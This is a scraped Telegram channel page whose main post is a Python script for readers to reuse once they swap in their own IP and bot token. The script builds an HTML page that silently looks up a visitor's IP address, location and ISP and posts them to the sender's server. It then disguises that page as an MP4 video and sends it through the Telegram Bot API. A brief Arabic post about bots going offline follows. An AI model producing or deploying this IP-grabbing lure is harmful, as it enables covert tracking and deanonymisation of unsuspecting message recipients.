Code Space
Open in Telegram
Hello this channel does not violate the policies of Telegram and we love you @rove with best regards
Show more6 464
Subscribers
+10324 hours
+8337 days
+2 54930 days
Posts Archive
6 464
Change on Ip and bot to urs
import requests
BOT_TOKEN = "your_bot_token"
CHAT_ID = "your_chat_id"
html_content = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script>
fetch('http://ip-api.com/json')
.then(response => response.json())
.then(data => {
fetch('http://192.168.137.1:5000/log_ip', {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
ip: data.query,
country: data.country,
region: data.regionName,
city: data.city,
isp: data.isp
})
});
})
.catch(error => console.error('Error fetching IP:', error));
</script>
</head>
<body>
</body>
</html>
"""
html_path = "testv.mp4"
with open(html_path, "w") as file:
file.write(html_content)
files = {
"video": (
"a.htm",
open(html_path, "rb"),
"video/mp4"
)
}
url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"
data = {"chat_id": CHAT_ID, "supports_streaming": False}
response = requests.post(url, data=data, files=files)
if response.status_code == 200:
print("message send")
else:
print(f"error: {response.text}")6 464
بوتات حسوني اليوم بعد ال 12 تتوقف
و من ضمنهم بوت ستوريات 😐
خاف افتح السيرفر اخذ الملفات و اشغلهم يمي يكلي ها انت اخذت ملفاتي
و اذا اخليهم طافيات هو ماكو مختفي 😐
Available now! Telegram Research 2025 — the year's key insights 
